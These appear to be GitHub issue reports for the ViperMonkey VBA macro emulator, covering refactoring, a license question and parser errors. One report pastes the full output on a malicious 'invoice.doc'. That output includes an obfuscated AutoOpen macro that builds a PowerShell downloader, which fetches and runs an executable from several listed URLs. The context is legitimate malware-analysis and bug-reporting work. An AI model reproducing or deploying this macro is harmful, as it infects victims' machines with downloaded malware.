Refactor process_file in vmonkey.py
process_file in vmonkey.py contains too much code, that should be in core.__init__.ViperMonkey, such as the parsing of document variables, parsing of excel files with xlrd, etc.
In the future, the ViperMonkey class should provide the complete API for applications to initialize and run ViperMonkey. vmonkey.py should be a simple CLI script to call the ViperMonkey API.
Problem executing vmonkey
Describe the bug
When I'm running vmonkey, this error:
linuxmint vipermonkey # vmonkey /home/javierfsp/Descargas/Fact_Num_SNE700041.doc
| | / ()__ ___ / |/ / ____ / /___ __ __
| | / / / __ / _ / / /|/ / __ / __ / /// _ / / / /
| |/ / / // / / / / / / / // / / / / ,< / __/ // /
|// ./_// // //_// ///||___/_, /
// /___/
vmonkey 0.07 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues
===============================================================================
FILE: /home/javierfsp/Descargas/Fact_Num_SNE700041.doc
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/vipermonkey/vmonkey.py", line 811, in process_file
vba = VBA_Parser(filename, data, relaxed=True)
TypeError: init() got an unexpected keyword argument 'relaxed'
Desktop :
- OS: Linux Mint 18
- Python 2.7.12
Explicit License
Hi there. Could you please explicitly include a LICENSE in your root directory? From the last paragraph I assume this is licensed under MIT, but I'm not sure.
FWIW at http://github.com/rubberduck-vba/Rubberduck we're looking into making code analysis inside the VBE to improve the experience. For that we might get some inspiration here.
It would be helpful if we could be sure that we can use this, otherwise we'll have to reinvent this from scratch.
On that note we have a pretty good VBA Grammar. (Note that it's licensed under GPL). You could build upon it to fix your Parser problems. If you have any code that blows it up, we'd love to hear from you in an issue 😄
When parsing a latest macros, got 'VBA_Parser' object has no attribute 'extract_form_strings_extended'
Was doing analysis of a macro, got an error about 'VBA_Parser':
-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO parsed Function FDQmvuwLDc (): 57 statement(s)
INFO parsed Sub lZFUFoiihGosi ([vwsOuUphvwsw as String]): 6 statement(s)
Module None
Sub lZFUFoiihGosi ([vwsOuUphvwsw as String]): 6 statement(s)
Function FDQmvuwLDc (): 57 statement(s)
Traceback (most recent call last):
File "/opt/ViperMonkey-master/vipermonkey/vmonkey.py", line 296, in process_file
for (subfilename, stream_path, form_variables) in vba.extract_form_strings_extended():
AttributeError: 'VBA_Parser' object has no attribute 'extract_form_strings_extended'
The whole input and extracted macroses:
root@vagrant-ubuntu-trusty-64:/opt# /opt/ViperMonkey-master/vipermonkey/vmonkey.py invoice.doc
vmonkey 0.05 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues
===============================================================================
FILE: invoice.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: invoice.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO LqqtcnpXN.bas
in file: invoice.doc - OLE stream: u'Macros/VBA/LqqtcnpXN'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Sub AutoOpen()
On Error Resume Next
IItjHHWqQ = (738497 * qXdJEWFzDDWJic * 160010 - kNMWT) + QCBHpEWXLIYZH + Sqr(VMzhjwlH) * (wLDGzldDhiv / 1363119)
bIwhAdfrO = (7181537 * UaoXN * 6070649 - UJJQCwlwZmi) + ruM + Sqr(uEDzjVF) * (XNBifI / 2626298)
PYuKlzKFA = (9114547 * DtJ * 1909904 - OHHtTKfDwEtsp) + DSQYSfzkbVkzC + Sqr(jRLF) * (TnaXPu / 1017319)
Application.Run "lZFUFoiihGosi", GRiZjhOm
sqLjDRQGs = (6881489 * UqiwijmJTIbX * 6371461 - oiVHcvBiNnGYv) + SiwMwi + Sqr(PjWIukFazRTi) * (PmuzPolqcrqG / 7095990)
VqlMOaCCY = (8988170 * wiKvDQVnuHBfnw * 9417706 - szms) + CJOPplCsbl + Sqr(svAhdqnMVDLdU) * (zPRSJ / 414912)
End Sub
Function GRiZjhOm()
On Error Resume Next
wqMWP = (3996302 * EoZFtMqLuiqB * 3003313 - sLdBVAfc) + bHTchaLu + Sqr(MYpawH) * (uoXKXIQt / 7404847)
NJcVEUccmAL = (5321547 * rHpUHcPz * 9599852 - jIljncor) + SMViaLHRBSr + Sqr(qGCUnYrQM) * (BJwKf / 7398333)
kYmkLGECQP = (5339295 * jbCCJLVcOIA * 2119418 - iFztCj) + zEwaWG + Sqr(MiQjV) * (RmQXnwqwLJjQ / 377716)
jaNsCf = tPXNQHij + Mid(GwRJ + "DiiwZvLzPEnhViLqdNgKjV(),'+' ScQ+ScQXvc+Xvc2PqSDC);&(vxp0WB+0WBInScQ+ScQ0WB+0WBvov'+'xp+vxpkvxXvc+Xvc0WB+Xvc+Xvc0WBp'+'+vx0WB+0WBpe-IXvc+XvcteXvc+X'+'vcmvx0WB+0Xvc+XvcWBp)(2PqS'+'D0WB+0WBC);brjmoGhnF" + UjUIK, 14, 179)
XUoPICJAzWi = (1812185 * zCScjLmwIuq * 8084794 - LGljAf) + UKYKzv + Sqr(QQKtMzIwZM) * (QjDfwLCZXjHYo / 1685490)
TPDNzbh = (1531422 * QpiHfkiVfzAiq * 1720145 - jYnkzK) + MMIXXzJsWkED + Sqr(JvFNfBhzAKYjO) * (aAAYIkb / 5526381)
AWISLNXoh = (3368890 * INjMnbQZmRElTa * 999158 - dqLCknJcisVMwT) + jdGFSU + Sqr(MZuwwzR) * (jaTJGkROOUDE / 5896870)
OYQfji = XDwQdDNkbibfCA + Mid(tzciV + "SNwhjZzkzkpa/?h0WB+0WBttpsXScQ+ScQvc+Xvc://www.bl0WB+0WB'+'u0WB+0WBe0WB+0WByac0WB+0WBhtcXvc+X'+'vcha'+'r0WB+0WBte0'+'WB+0WBr.com/DXScQ+ScQvc+XvcIjVX0WB+0WB4U/0WB+0WB'+'v0WBScQ+ScQ+0WBxp0WB+'+'Xvc+Xvc0WB.0XvNPNkpqs" + rpbGFsPouNKUJn, 9, 198)
bdVUwwS = (3198342 * pUcvtiS * 1091214 - jzGfGccrtm) + LLrHVIsWkYO + Sqr(NSSROQR) * (soMGO / 4676338)
iVGmQdzmFU = (6947939 * OIWV * 679608 - IidVZkqwVH) + itMnLOb + Sqr(cqWwkszYj) * (cCsP / 6250099)
iHLobN = (2002652 * ntqhTwTFokiX * 4006564 - uut) + pljtdcMGp + Sqr(FZONCzYUlvIuD) * (wISBOEhHzoqYH / 8873691)
YIuERWh = GEdTBXHNVmdJdm + Mid(mrLK + "XvIr]113+[NMMYdRvzSQaNQCNJpGU" + LutmMfPOrkOPp, 4, 7)
QVGLWaVDM = (4931494 * dsdFXavn * 5612112 - jmBftYIzBWvqT) + vEJVVOCpwurcBU + Sqr(XWHFuQiHfwM) * (wYD / 5238001)
ATkArFD = (7444198 * jJTQaSOq * 8427625 - GnQXoOdznlZj) + wiXJM + Sqr(QsT) * (EUKR / 1365739)
AwNUls = (9306369 * qDYsBrhpNkvE * 7549426 - zAz) + lDICnbzm + Sqr(MCizWCwuVI) * (vnpUwTU / 7812494)
pzwmTSnCD = NUMGazPVR + Mid(VfZIzSv + "wkzwLwOCCDMafnhdnKkzJCDAioQmjzPQhtt0WB+0WBp://0WB+0WBs0WXvc+XvcB+Xvc+Xvc0WBoftedg'+'e0WScQ+ScQB+0WBbScQ+ScQd.com/0WScQ+ScQB+0WB687yc/?0WB+0WBht0WB+0WBtp0WB+0WB://0Sc'+'Q+ScQWB+0WBdulfacoll0WB+0WBScQ+'+'ScQtda.com/rL7jYuDDVV" + nzUJLrlLza, 32, 185)
jzPajkdm = (1340531 * RCBJSGELYji * 4024419 - PjvnszbckT) + frjzpmIi + Sqr(DRkXrV) * (ZjEuUsGomLVOjf / 1269297)
GcEzHDOnwC = (6412524 * iibWHVmYAG * 5862895 - vYvWwBvjZCnkvK) + RuziwkCsNu + Sqr(SLRWUlcrr) * (ZsidLBIcqqb / 9374416)
EiOSdY = (8230971 * dCYhNtf * 6620042 - VjkODhBID) + ssCOElj + Sqr(QWEAVUzsRMudz) * (qQMu / 5218482)
YiGJDdHkO = EFUNuVtjoQw + Mid(OIUmjmYBoGdsc + "zLVLdXlqoGKvaNtlqBcCdtsEdpviKXRepL'+'aCE(Xvc7NZkYm" + wNoETGIGi, 31, 16)
htzPIql = (7224790 * JKw * 7872363 - hXcsVUQ) + swzwrfurh + Sqr(VtiAT) * (INbpmKliKtizsV / 8853445)
CNqDZOW = (9226971 * nvPaWtWrKczav * 8382267 - DijItbriNR) + zAvwLRZzqEEY + Sqr(TFwcimHPCww) * (llCTwN / 360105)
avcJqbEJLsV = (1648109 * vVwLQhAwAbw * 1147380 - oocOAaJYvBwkaf) + furCPCYj + Sqr(QRE) * (SBWz / 1682149)
jaruKt = EuphYdwcboUv + Mid(zPLWVNPQL + "bElikvfsZKibbCJYMjoScQ+ScQqdO0WB+0WBadFILqdleKjXvc+XvcV(20WBScQ+ScQ+0WBPq0WB+0WBasfc.0WB+'+'0WBKjV0WB+0WXvc+XvcScQ+S'+'cjiUL" + oNZVlB, 20, 101)
IsHHvGj = (2582450 * bQsYPFpbC * 5988424 - vmB) + qhIQjiE + Sqr(DFovzBUSbsGUZD) * (qUIGUWDwtAJzB / 392744)
sYqWDzjzP = (4597903 * zXUoSaJpa * 6580787 - aCfjs) + oRwaXkZAHuuq + Sqr(SQD) * (GwFOaP / 2142684)
NlRzd = (3558558 * mKcvNTQKMk * 5358157 - cnu) + LfOzVPwXoZkn + Sqr(OCkIqwPX) * (hbatG / 6172234)
RsPmX = zNqhNawJATzb + Mid(CcQGkwqwQFaw + "GIzvqDaiSSioN((Xvc NfVGC" + WCFufBboiKo, 10, 10)
JCzzBYH = (9080079 * vabzzSoof * 5285015 - SDt) + zHIwkQsUjKOlJ + Sqr(jNzKitIBozPCG) * (Ndww / 1050856)
kuLqpw = (9086843 * TzSKNCGvn * 7131299 - fuwNEHZzjv) + LjiKmGD + Sqr(SfNTP) * (fAQqCF / 157926)
IHSjJa = (2430461 * XLJzYqXFMf * 71729 - ibDQzsbSBRbh) + ZHIJjpSwBLwdGi + Sqr(uaBnOZwY) * (ZDNZtf / 1078907)
uGbHFpPu = LiJLaOjwTKW + Mid(FHojdm + "APTJXpsWGFJsnDKItGitbn+vx0WB+0WBpe'+'vxp+Xvc+Xvcvx'+'pw'+'-'+'o0WB+0WBbjec0WB+0WBvxp+vx0WB+0WScQ+ScQBptvxp) rXvc+Xvcandom0WB+0WB;2PqYY0WB+0WBU 0W'+'B+0WB= .0WB+0WB(v0WB+0WBxpnevxp+vxpwvxp+vxp-o0WB+0WBb0WB+0WBjectv0osm" + hqulpiQAwnYbIQ, 23, 192)
HSHlVSaZnw = (6916314 * ctEVFNBGf * 7585056 - iWzhjOHImL) + TVE + Sqr(wIZVwULCNolL) * (rmlhS / 8498435)
JbKbdw = (9446210 * qlrOblzScZjRP * 3261743 - jKoLSUjszDwRA) + SBdHwGXi + Sqr(WiOk) * (OCtuatFXdji / 4853788)
bcjBIwiFqw = (1236344 * tLfTzsJXFKTKV * 9596232 - RcE) + wivJBrGUvYw + Sqr(XAipvrPRr) * (qwjbPYHUL / 784313)
EwSQQRuiJfA = bAziOvfphqhQ + Mid(nsNF + "zDhpFXinYZpilHhjPEiJcLinVoke-ExpReSSIO'+'n')-rEpLAcE '2lO',[CHAr]124 -rEpLAcE 'ScQ',[CHAr]AMKBPYlvDCGCsOdw" + bPnSadju, 23, 69)
jGLFpzBAn = (6527105 * PstOnaSOqnBjF * 6415497 - NlqmzmazcDzHLn) + QfNSbQNLZMZH + Sqr(MYtXBNNbCPkFou) * (LoSGaD / 4421268)
vLJKPIDmAsZ = (4221817 * mGizZQa * 4599412 - ilDJcGzZL) + PdMmVw + Sqr(ltShspCakufOBl) * (MbKJNCLMIAsI / 1266062)
GNOALF = (8023150 * TNCaijFwl * 9231623 - isL) + LKcZQkb + Sqr(izahJ) * (AjwlKbRLbG / 1700712)
zhVSfzbowBG = pIOzCdbqYO + Mid(IhvKqIHaNnsWnz + "sodwv(0WB20WBScQ+ScQ+0WBPqnsadScQ+ScQ0WB+'+'Xvc+Xvc0WBas0WB+0W'+'Bd = ScQ+ScQ&(vxpnvxp0WB+0WBXvc+XvcScQ+ScQzjkiHYomkmDHSTUVjMIHcQoSOfZwpOqPDa" + ZciMaMsC, 6, 102)
SpjsKqjl = (218551 * iWQ * 1736849 - CwWi) + jTrS + Sqr(PLU) * (QqwCJLOnzIW / 7215500)
NvMldWE = (3039849 * ozJQQjoCwwzS * 5418801 - TOplNBkJ) + THzrPANHVRi + Sqr(Trz) * (luOsAEqjpUjSk / 4689507)
jFTDq = (2809099 * iPp * 1624567 - rZBkqcB) + VzXqqbGWQjOROC + Sqr(RvXwCaZDBqcuU) * (IKcol / 3815252)
DrrVvDiU = iYNMTTAq + Mid(ifjZprBUcEzv + "fsea0WB+0WBk0WB+0WB;}ca'+'tch{'+'}}0WXvc+XvcB).replacE(([Xvc+Xvcchar]50+Xvc+Xvc[char]80+[char]113),[sTring][char]36).replacE(0WBKjV0WB,[sTring][chScQ+ScQar]34).replacE(([char]76+[chalNmPipNzTEpVESLiaspkmCmzXjVcfFsj" + lPEzhk, 3, 180)
oSfoolGVia = (2635596 * mJIZlcciZF * 3749276 - AusLXazXF) + cUqzpOXYqcjP + Sqr(XFGpOcGF) * (VpfEikYvAp / 5264528)
uZBEdk = (9351841 * oionNLBPrw * 6936243 - UGRllvzk) + zBSkknAucqoZqQ + Sqr(BaPuEPdt) * (jJdGKPubMiphV / 653756)
JETXPNYQqIf = (5614533 * BUPGvzdp * 8820195 - KjEfiVHXEaJ) + kMwMMIbqfXlWD + Sqr(OnzjjnMZEOXjz) * (ZzzCOHj / 458777)
mQMHa = McuwHhNfbr + Mid(ofjo + "PbCchar]1'+'00),0WBbyv0Xvc'+'+XvcWB).replacE(0WBQI20WB,0WBwhtXvc+Xvc0WB).replXvc+'+'XvcacScQ+ScQEScQ+ScQ(0WBvxp0WB,[sXvc+XvcTring][char]Xvc+X'+'vc39) t'+'DXvc+XvcvXvc+Xvc. ( 7NwPSHOME[21]+7kCnjqCZPFERotiltfazuKD" + fzXwwVz, 4, 186)
oRLEN = (1558493 * iYjIvL * 2357063 - QtKZJVRTp) + MNF + Sqr(bItaYuct) * (NFnW / 2832175)
WYGWToKwCT = (2198963 * hcurHijv * 4601162 - qNAcwuLIwaOV) + RAXlzUWzDIPW + Sqr(SNSwYzCjEOt) * (QKbNRkLLpc / 8156570)
YXCGRMbtw = (6909890 * mbBqmFkFMbzqA * 313412 - TDNmiG) + JullXELuqX + Sqr(DmWAsRIIZE) * (iXRjtslODFm / 1074679)
SBazRVnwS = inVNDEmu + Mid(cnGUYXuVhK + "oHWB+0WBxpScQ+ScQ) Sys0WB+0WBt0WB+0WBem.Net.We0WB+0WBXvc+XvcbCl0WB'+'+0WScQ+ScQBie0WB+0WBnt;2PqNSB =0WB+0WB 0WB+0WB2Pq0WB+0WBns0WB+0WBa0WB+0WBda0WBXvc+Xvc+0WBsd0WB+0ScQ+SWtXaOlBku" + hpfI, 3, 168)
mqrbzRS = (5013790 * OUoKSJ * 5296272 - cRhEsoQ) + cimzEPUUz + Sqr(aTZkEdsr) * (htVbIJGffhqZ / 4398299)
qYLzkGvcP = (6098403 * sDp * 5426073 - zATLt) + ItsNDMBzjjH + Sqr(ioz) * (omIzDnWrBnP / 6035918)
vLYvHBY = (8413712 * aJiZBMnSdi * 4739810 - wWkALoOP) + hDtfV + Sqr(ALPwVFCG) * (TEmkvVIdadqAHA / 5493933)
BCqGIlqLC = HEBifuRla + Mid(zOuS + "mwbLrnIpocwOlvbNwYUFR & ((vAriABLe '*mdr*').NaMe[3,11,2]-JoIN'') ( ((' (ScQ InVoScQ+ScQKE-e'+'XPreSLiillhchFCkhQ" + vdVhc, 22, 78)
EuPVDbDajlO = (4448451 * KnUFdhNriLGvI * 2842512 - vYJwkUUWamHiU) + WrBStvaOzq + Sqr(CuCvui) * (bdius / 6546721)
ZasIjpdGDVI = (7494118 * qRtSVCtK * 1527150 - EcPSTha) + ihaSbfD + Sqr(DqCczTfUFJUfUL) * (jubqG / 9197311)
jdjoJL = (1644368 * zTYzE * 9661149 - pOOZwCHf) + kzuNKMv + Sqr(XYqXzpzAujFIaU) * (WjTGQvMGb / 2770067)
CwjviEpA = QbVsGptjpmG + Mid(iCUuPm + "FXmoUTmfTRJrciawRFAbiohjfndKdhIQcvx0ScQ+ScQWB+0WBp + 2PScQ+ScQ0WB+0WBqN0WB+0WBS0WB+0WBB + 0WB+0WB(vxp.exvx'JpPL" + GBdUqYZSBi, 32, 76)
MGXlC = (4346463 * hqGiCLSP * 1838615 - kozAjVkAtuPf) + hzXIkZrQp + Sqr(cNJdtXPNrrz) * (cYDpjmrWcJBN / 4744878)
FRSCPuToA = (5957442 * DipSauCWmW * 8383596 - cdhXodtXwEut) + YTK + Sqr(LwFOsMf) * (YZt / 5044553)
VlnFs = (395433 * TovPsv * 7273075 - kfHhzn) + OCbrCbZmckRBUP + Sqr(zzw) * (bEIIaPhwMZG / 2146148)
UrDBKwXNc = FJBuAkYa + Mid(fHAqYQYEW + "mCNjVvNDChBZVXXcQWScQ+ScQB.n0WB+0Xvc+Xvc'+'WBext(1000WB+0WB00, 282133);0WB+0WB20WB+0'+'WBPqADC0WScQ+ScQB+0WBX 0WB+Xvc+Xvc0WB=0WB+0WBXvc+Xvc ScQ+Sc'+'Qvxp 0WB+0WB http0WB'+'+0WB://y0WB+0WBou0WB+0Xvc+XvcWBr0WB+0WBequXiuJiF" + XsP, 16, 199)
lnIBrN = (948623 * hOzwiCpdwW * 3284357 - juz) + AfOFbQGiN + Sqr(qzGWiBszwv) * (PdpPQCFDcjSY / 9762763)
hrqWYbmI = (884113 * AzFQITjCLs * 4437113 - nPHjvCmkB) + pLOAakzX + Sqr(HREBtrim) * (jbdXtaS / 7847130)
uijXYQJkY = (3908533 * WWMUccKuBHswCn * 3911364 - KiNOrN) + REauSR + Sqr(ilQCBBvzbYiw) * (fbhZpCiPja / 1040128)
ujjCIFcZNi = rFKWSizq + Mid(CSfbtQzffJkMM + "pnvdVjhzddUFvFiQBToStr0WB+0WBLqdOaFW" + FuBcUcNMVZEKO, 16, 17)
NXUutvV = (6864748 * WAEPnYwKLwst * 182062 - ZqqTTGUzZD) + JCclZLcXEtB + Sqr(cqoawWDuY) * (fhzpaNd / 4197381)
XhFDGiU = (4315750 * BfdVVYmkP * 4239187 - nXNNcifXdWILqX) + njkOuiXaczNSF + Sqr(kSiCWrJk) * (wjwwtEsTm / 9638069)
DJcYGBfRLM = (5037120 * CzAbOQzlQPL * 5074744 - sDdITfmDHmfwji) + jdaUini + Sqr(ibIbLwL) * (XXzABOLSSoj / 8986454)
JoXsPHY = JHuQChs + Mid(NZHhzmSUM + "KRCCpcalCOEwUQYljujImNoNOUwpmKtc+XvcWB+0WBSplit(v0WB+0WBxp?vx0WB+0WBp);ScQ+ScQ2PqSDC0WB+0WB =0WB+0Xvc+XvcWB 2Pqenv:public +Xvc+Xvc vxpQI2XvScQ+S'+'cQc+XvScQ+ScEslcCfw" + ojuj, 32, 128)
nbrYLC = (9207751 * pkwZufcoq * 3167376 - iHNObw) + MGuIH + Sqr(UjoEDWfqli) * (qIWJcw / 9136559)
kAzlZ = (7531928 * GnA * 7803229 - iovzpjhcQ) + NrXk + Sqr(kYsYzYT) * (zjJwVEajf / 23716)
wdDjl = (5437091 * ijswwjNr * 3514721 - lZKTShvbpELNvN) + kMYpYhrvLl + Sqr(fwa) * (KbJDzko / 262438)
wCVGUOwBfi = UfilbBmor + Mid(KKkzhLEaEwDIY + "OzlRlJYlal0WB+0WBlet0WB+0WB.nScQ+ScQl/0WB+0WBp1ScQ+ScQXvc+XvcwHk0WB+0WB/?YUtwRKiqhFi" + dUVSHCqGnFJ, 9, 65)
NuITskvBb = (9602598 * NAfLwU * 4936868 - nDGpST) + nCodiRvOWSJD + Sqr(HmOH) * (SEB / 3548133)
rzFGPSu = (8175262 * ZJoEMnHs * 3633801 - zbrt) + wSlJtpR + Sqr(HBpzoAP) * (ULREVdqCiLQk / 9682701)
IurwQ = (1545400 * XNhTl * 3069440 - ziHoj) + XoT + Sqr(DRiPZowVcjbhY) * (WzqSlGjdYL / 2722596)
dSbwhjw = slELXNVnfQOU + Mid(CuPuiwiRCwBW + "cAzGftOKVIwSiNwpShOMe[30]+0WBx0WBXvc+Xvc)Xvc).RepLaCE(XvctDvXvc'+',[STRing][cHar]124).RepLaCE(XvcbyvXvc,[STRing][cHar]96).RepLaCE(Xvc0WBXvc,[STRing][cHar]3ScQ+ScQ9'+').RepLaCE(XvcwhtXvc,Xvc'+'CsmXvc).rOfODUQHGI" + jDsQuwLmzmdjX, 14, 187)
XbaEAskmsIL = (8203844 * SYpDhpzApWuUM * 4376014 - UsiwZWNPZa) + fNHnKuGjRZUd + Sqr(ZJZcKSkpqdFAoC) * (VEJPdq / 1986522)
EVKwZr = (7271367 * CMzOjFIAOfYPz * 7023409 - HpBp) + BmVrpLMQEzJ + Sqr(YjawSW) * (kUFlJ / 5811770)
kTKYWG = (290662 * UDInoVBr * 2923024 - IYUssvPVIrQJ) + oTrE + Sqr(wBMNom) * (MvLUuXoLHKzos / 5443913)
khYpDPEIZEO = wjwmftsZjjdv + Mid(YjwJjhPJaSjMFC + "ClwXvc,[STRing][cHar]36)ScQ+ScQ'+' )ScQ)'+'.repLaCE(([CHaR]88+[CHaR]118+[CHaR]99),[STrING][CHaR]39).repLaCE(([CHaR]67+[CHaR]115+[CHaR]'+'109),[STrING][CHaR]92) 2lOjjRzbHohudchPEZCwiVcJTmw" + LZsSB, 3, 161)
XDlTAWm = (5875751 * DMoniZs * 5768406 - iQcrXimtzi) + NGswJS + Sqr(HpfMzpwtEwH) * (ECGCRPXMikh / 6580955)
mRhCQlpcVH = (77360 * OIwTrdM * 7715931 - ozVSnsdZpmO) + NHEbhlGGW + Sqr(zMca) * (zkFdXPRSDvwk / 3750776)
zLkjo = (305408 * svmuB * 144806 - sJsGhOjCJqMCf) + kJqKwpBfkAmE + Sqr(PBZhZ) * (FrvlRiClAmGX / 3328524)
wqCKwzuB = WnVKHKwT + Mid(zQkuOdu + "PiLCwOUmzcfWents-d.c0WB+0Xvc+XvcWBom/Xvc+Xvcxrm0WB+0Xvc+XvcWBXvc+XvcC0ouYqjEcdDn" + hzfADBOUczz, 13, 58)
MipkARphs = (6722250 * IOiwUiOiXtzFB * 4182825 - CwjEwXTOVILIqU) + OwtJImFMTiLTQ + Sqr(cVrhAqitQ) * (UoAInJVXKdf / 9952586)
vaCXai = (2364504 * NNwjQWkDCktnT * 5221191 - dLUhGoTlwZKM) + JnwcJzTntwct + Sqr(RmP) * (AquihS / 2114636)
iQUjLII = (3486857 * DubA * 2052020 - KwuP) + RdTHCjMroEX + Sqr(WjYURFcUnK) * (wZL / 8719090)
tEDmWzLAjJi = UHmvkELrNY + Mid(TcBQAjJnMazoX + "wWB+0WBrk/'+'?http://0WB+0WBmrXvc+XvcwdCHwzljTFMU" + btDAtidV, 2, 37)
Xwaqz = (4843435 * FwAJsiB * 9522420 - ZiPUjCQLGZ) + jqO + Sqr(cirz) * (EpHjzYDfDMlkoN / 3448514)
dVcnLaAA = (7656756 * iaXHWkQXlO * 6961017 - hNrEwZkWiWHzkI) + oRvcwQzAQasiE + Sqr(JMKSjWwtfqohR) * (HTXWNrbFqmnfjN / 5188816)
DRwhDz = (5796114 * rjiZ * 2040248 - jAluumEoOzBtwC) + UNPDVXi + Sqr(mlSB) * (zBmWwWrWbwh / 3757016)
PAGiG = WiFWXdwWWnfzF + Mid(dBjNFTl + "XYNuwDsOnP39) ) AD" + srSuwHZXiqp, 11, 6)
LTJiYYzVs = (4982010 * aiX * 30444 - wpZc) + FiSHLTDXDQld + Sqr(jmF) * (vXu / 8219959)
EjWviCIwulM = (7516736 * TQipi * 7787103 - VZQccAQSu) + AulJ + Sqr(zjrNCw) * (ChzSYzqjiZiZu / 2233198)
hznXWj = (2445499 * DlpiBSuw * 384422 - DSw) + QmibXifKcQbNba + Sqr(LODlG) * (bMNsknAQXwYi / 6200531)
UZjZBvHTV = wZfiTibkWSOW + Mid(ZBwzIbkTrNMi + "jU0ScQ+ScQWB+0ScQ+ScQWScQ+ScQBScQ+ScvjwjOcipimjlzvcEQnjIYDa" + aLztQijjZFYESo, 3, 34)
SnmizSzVl = (1012974 * DfvSPUv * 2939970 - MuSo) + EtUQ + Sqr(lwqqWTWXk) * (jPw / 741985)
iLNislTiOj = (769814 * IvB * 4131637 - qkaiPWlM) + taOUUYMoY + Sqr(swLNXzwOkDvwTu) * (uLQ / 2283914)
ajnoLjj = (1365626 * lKGHIAijfqUWCd * 4894669 - WCjTHBJhvH) + QZNwcRA + Sqr(mEGP) * (RfEMbbQRiOoNin / 8219228)
RiNbl = wrToitsJ + Mid(GnqTkqmA + "btqHillsbai0WB+0WBpmfCwiEvppnw" + rKoZUinuiu, 11, 10)
picEKcv = (8736193 * QCVmSj * 4462370 - urnXZv) + PnFSsJfcwtL + Sqr(arABvXZTzGJdW) * (cHuXBJCruifNAE / 7110451)
QuYYnQcLl = (5024503 * tGpwXtps * 45087 - bmI) + bvwhXhbsC + Sqr(iwSWhWUiZjQXh) * (FNFiAIaEmEERDW / 2545097)
RchCQkkOri = (8508294 * BEwNabSKdjtNZ * 2598746 - NwcK) + zrtRdKOSQ + Sqr(zVjoPSk) * (ilmTXchrMqz / 738872)
uzKuM = BYMAhOJSurEB + Mid(nbQnjBbw + "FHNLCaCmBhkHwwWiKhWYdDihDwtiX+'0WB+0'+'W'+'Bp+vxpe0WB+0WBvxp);foreac0WB+0Xvc+XvcWBh(0WB+0WB20WB+0WBPqas0WB+0WB'+'f0Xvc+XvcWB+0WBc0WB+0WB inScQ+ScQ 2PqADCX){t0W'+'B+0WBScQ+ScQry{0WB+'+'0WB2PqYYU.KjVDo0WB+0WBLq0WB+0WBdWnlLXvc+XvcGFhAjjC" + GTqClKYizdJWlf, 30, 198)
GRiZjhOm = FDQmvuwLDc + uCPzJKfj + VYZFQcMzarP + ChrW(34) + NAuKiXhkw + BCqGIlqLC + RsPmX + zhVSfzbowBG + uGbHFpPu + SBazRVnwS + UrDBKwXNc + RiNbl + wqCKwzuB + tEDmWzLAjJi + wCVGUOwBfi + UZjZBvHTV + pzwmTSnCD + OYQfji + JoXsPHY + CwjviEpA + uzKuM + jaruKt + ujjCIFcZNi + jaNsCf + DrrVvDiU + YIuERWh + mQMHa + dSbwhjw + YiGJDdHkO + khYpDPEIZEO + EwSQQRuiJfA + PAGiG
ldKzYqdTR = (6992730 * zXSMMDSRrFI * 1081906 - PYl) + NuJKcsNa + Sqr(wiZUqsuwRphhzf) * (Ptsc / 4514312)
IiAEDFXac = (4165112 * FlPHorWOPK * 1064289 - iDrPPEuizkDnNi) + QkVUTvK + Sqr(wiXRYWdMM) * (kRA / 2266839)
qIWimiUib = (8714519 * WGiuq * 7237241 - Xav) + rnVMWXqldM + Sqr(EuNzlJf) * (NGiHC / 3130657)
End Function
-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO parsed Sub AutoOpen (): 7 statement(s)
Module None
Sub AutoOpen (): 7 statement(s)
Function GRiZjhOm()
^
Expected end of text (at char 626), (line:10, col:1)
-------------------------------------------------------------------------------
VBA MACRO fXAmrsMQl.bas
in file: invoice.doc - OLE stream: u'Macros/VBA/fXAmrsMQl'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Function VYZFQcMzarP()
On Error Resume Next
XSMEXzO = (1989820 * nIuWFWmiaIEGG * 184422 - SqlIG) + zMCh + Sqr(lNpaTJrkccNHM) * (djBlIpMLCjwNhE / 7443724)
FrjsV = (8114424 * rpLlYsApuOWXhE * 6719556 - McXvatsj) + KFcFcnzm + Sqr(WSAKEqBwNa) * (nViPnVbPuVzw / 6106751)
kuhiSzlWhSi = (2195479 * nXjSbY * 7157752 - iQY) + Yht + Sqr(jSpmpbMSGL) * (sKYVUzqDiN / 9109102)
JBhYa = zBdQlHdRS + Mid(RctNvT + "iProYpRQwh9uz2dAquM" + NBowp, 7, 1)
TLwRYKEC = (4034253 * NDmIAqTGri * 5106673 - rTwjjaI) + lEKSVElaj + Sqr(RoDjz) * (YGqCXD / 711520)
rawJufOnlW = (4848219 * PlwVAkzbr * 8808308 - sTmvF) + ajNlOLWiLckGG + Sqr(AlrGSpFfaT) * (MmnVET / 8887265)
jmMdtrkDvn = (9460461 * dXLpBaampI * 2502016 - kLJHcjd) + nuFuYB + Sqr(iNGIqJcE) * (ZCFrOSqSG / 8538378)
wcQNw = RCUvwOUDiBrRip + Mid(YLKQLPqt + " 2UdizGNIMCMAkj0RpZwVCAfnknCYhGsh^ell&&!%QqzwPcS7" + KuEBhdPRkTYk, 32, 11)
khzwqdNziS = (179384 * DnnjZzE * 9907518 - UZclVKImG) + XtGSkjUTzjCM + Sqr(jVffdkaFmZ) * (iwjW / 7310879)
wuTbsXOLN = (4231899 * nUwdbzUD * 9883559 - dHSb) + uvPp + Sqr(iCfkkUBnnz) * (hbIOriCuiKakVb / 6026529)
tjqSbMPSzIj = (1331864 * WCnGwqulp * 2359607 - HwhQBGwfKNQLs) + HVDRKIF + Sqr(WQkKrl) * (OcCWKnldKiO / 6007726)
